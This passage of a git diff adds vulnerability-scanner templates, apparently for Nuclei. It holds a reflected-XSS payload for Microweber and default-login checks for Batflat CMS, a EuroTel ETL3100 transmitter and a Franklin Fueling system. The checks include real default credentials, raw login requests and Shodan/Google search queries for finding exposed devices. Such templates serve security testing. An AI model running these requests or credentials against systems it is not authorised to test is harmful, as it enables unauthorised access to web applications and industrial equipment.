|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains_all(body, "alert(document.domain)", "microweber")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,41 @@
|
||||||
|
id: batflat-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Batflat CMS - Default Login
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings.
|
||||||
|
reference:
|
||||||
|
- https://www.exploitalert.com/view-details.html?id=34749
|
||||||
|
- https://cxsecurity.com/issue/WLB-2020010100
|
||||||
|
metadata:
|
||||||
|
google-query: intext:"Powered by Batflat."
|
||||||
|
verified: true
|
||||||
|
tags: default-login,batflat
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /admin/ HTTP/2
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
username={{username}}&password={{password}}&login=
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- "admin"
|
||||||
|
password:
|
||||||
|
- "admin"
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
host-redirects: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/html")'
|
||||||
|
- 'contains(body, "Batflat - Dashboard")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,46 @@
|
||||||
|
id: etl3100-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: EuroTel ETL3100 - Default Login
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.
|
||||||
|
reference:
|
||||||
|
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php
|
||||||
|
- https://www.exploit-db.com/exploits/51684
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
verified: true
|
||||||
|
shodan-query: html:"ETL3100"
|
||||||
|
fofa-query: body="ETL3100"
|
||||||
|
tags: misconfig,default-login,eurotel
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /index.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
txtUserId={{username}}&txtPassword={{password}}&btnLogin=Login
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /exciter.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- user
|
||||||
|
- operator
|
||||||
|
password:
|
||||||
|
- etl3100rt1234
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code_2 == 200'
|
||||||
|
- 'contains_all(body_2, "FM Exciter", "Summary", "/logout.php")'
|
||||||
|
condition: and
|
|
@ -0,0 +1,42 @@
|
||||||
|
id: franklin-fueling-default-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Franklin Fueling System Default Login - Detect
|
||||||
|
author: r3Y3r53
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable.
|
||||||
|
reference:
|
||||||
|
- https://www.exploitalert.com/view-details.html?id=39466
|
||||||
|
metadata:
|
||||||
|
google-query: inurl:"relay_status.html"
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
tags: default-login,franklin
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: text/xml
|
||||||
|
|
||||||
|
<TSA_REQUEST_LIST PASSWORD="{{password}}"><TSA_REQUEST COMMAND="cmdWebCheckRole" ROLE="{{username}}"/></TSA_REQUEST_LIST>
|
||||||
|
|
||||||
|
attack: pitchfork
|
||||||
|
payloads:
|
||||||
|
username:
|
||||||
|
- roleAdmin
|
||||||
|
- roleUser
|
||||||
|
- roleGuest
|
||||||
|
password:
|
||||||
|
- admin
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'contains(content_type, "text/xml")'
|
||||||
|
- 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")'
|
||||||
|
condition: and
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue